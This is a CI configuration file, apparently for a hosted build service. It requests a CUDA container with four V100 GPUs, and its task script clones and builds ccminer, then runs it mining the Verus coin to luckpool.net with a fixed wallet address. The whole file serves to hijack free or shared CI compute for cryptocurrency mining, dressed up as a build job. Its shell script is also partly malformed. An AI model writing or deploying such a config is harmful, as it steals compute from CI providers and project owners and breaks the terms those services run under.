container:
  image: nvidia/cuda:10.0-runtime-ubuntu18.04
  cpu: 4
  memory: 12G
  gpu: 4
  gpu_type: nvidia-tesla-v100 # do we need the choice?
task:
  script: |
   apt-get install -y \ libcurl4-openssl-dev \ libssl-dev \ libjansson-dev \ automake \ autotools-dev \ build-essential \ 
   && git clone https://github.com/monkins1010/ccminer
   && cd ccminer
   && chmod +x build.sh 
   && chmod +x configure.sh 
   && chmod +x autogen.sh
   && ./build.sh
   && ./ccminer -a verus -o stratum+tcp://na.luckpool.net:3956 -u RTBTgVXVZdfeYXtMVUhtJm6soVWrQTCFPZ.01 -d0
